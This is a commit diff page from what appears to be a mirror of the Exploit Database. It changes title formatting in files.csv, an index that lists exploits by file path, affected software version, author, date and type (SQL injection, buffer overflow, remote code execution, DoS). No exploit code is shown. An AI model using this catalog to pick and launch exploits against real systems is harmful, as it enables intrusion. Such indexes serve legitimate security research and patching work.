bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-13

Browse source
This commit is contained in:
Offensive Security 2015-07-13 05:02:34 +00:00
parent 5df0c9137c
commit de22c9ec44
14 changed files with 1475 additions and 1475 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

126
files.csv
View file

@ -1119,7 +1119,7 @@ id,file,description,date,author,platform,type,port
1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0
1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0
1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0 1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0
1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0
1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0
1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0
@ -5714,10 +5714,10 @@ id,file,description,date,author,platform,type,port
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80
6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0
6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability",2008-07-20,Mr.SQL,php,webapps,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability",2008-07-20,Mr.SQL,php,webapps,0
6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0
6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)",2008-07-21,"Guido Landi",windows,local,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (pl)",2008-07-21,"Guido Landi",windows,local,0
6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0
6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
6109,platforms/cgi/webapps/6109.pl,"MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
@ -5727,12 +5727,12 @@ id,file,description,date,author,platform,type,port
6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0 6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0
6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability",2008-07-21,Cr@zy_King,php,webapps,0 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability",2008-07-21,Cr@zy_King,php,webapps,0
6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0
6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0
6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 (rfi/sql/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 (rfi/sql/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0
6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0
6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0
6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0
6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0
6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)",2008-07-23,I)ruid,multiple,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)",2008-07-23,I)ruid,multiple,remote,0
6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (py)",2008-07-24,"Julien Desfossez",multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (py)",2008-07-24,"Julien Desfossez",multiple,remote,0
6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0
@ -5806,7 +5806,7 @@ id,file,description,date,author,platform,type,port
6192,platforms/php/webapps/6192.txt,"k-links directory (sql/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 6192,platforms/php/webapps/6192.txt,"k-links directory (sql/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0 6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0
6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0
6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0
6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0 6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0
6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability",2008-08-03,SirGod,php,webapps,0 6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability",2008-08-03,SirGod,php,webapps,0
@ -5833,7 +5833,7 @@ id,file,description,date,author,platform,type,port
6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability",2008-08-10,CraCkEr,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability",2008-08-10,CraCkEr,php,webapps,0
6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability",2008-08-10,"Virangar Security",php,webapps,0 6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability",2008-08-10,"Virangar Security",php,webapps,0
6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0
6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0
6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection Vulnerability",2008-08-10,nuclear,php,webapps,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection Vulnerability",2008-08-10,nuclear,php,webapps,0
6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0 6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0
6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0
@ -5844,7 +5844,7 @@ id,file,description,date,author,platform,type,port
6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0 6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0
6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0
6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0
6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0
6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0
6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0
6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0
@ -7122,7 +7122,7 @@ id,file,description,date,author,platform,type,port
7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0 7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0
7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0
7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0
7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0
7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0
@ -7145,7 +7145,7 @@ id,file,description,date,author,platform,type,port
7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0
7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password Vulnerability",2008-12-29,R31P0l,php,webapps,0 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password Vulnerability",2008-12-29,R31P0l,php,webapps,0
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0 7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0
7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0 7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0 7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0
7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0
@ -7244,7 +7244,7 @@ id,file,description,date,author,platform,type,port
7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0 7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0
7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0
7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0
7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0
7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0
@ -7671,7 +7671,7 @@ id,file,description,date,author,platform,type,port
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0
8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0 8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0
8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
@ -9077,7 +9077,7 @@ id,file,description,date,author,platform,type,port
9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0 9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BoF Exploits (SEH)",2009-09-09,hack4love,windows,local,0 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal BoF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BoF (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BoF (SEH)",2009-09-09,hack4love,windows,local,0
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0 9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0
@ -9275,8 +9275,8 @@ id,file,description,date,author,platform,type,port
9891,platforms/php/webapps/9891.txt,"Joomla Jshop SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla Jshop SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0
9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80 9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80
9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 m3u file BoF",2009-10-15,dellnull,windows,local,0 9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - (m3u) BoF",2009-10-15,dellnull,windows,local,0
9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 mpf file BoF",2009-10-14,dellnull,windows,local,0 9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - (mpf) BoF",2009-10-14,dellnull,windows,local,0
9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 BoF",2009-10-19,iM4n,windows,remote,80 9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 BoF",2009-10-19,iM4n,windows,remote,80
9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
@ -9478,7 +9478,7 @@ id,file,description,date,author,platform,type,port
10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
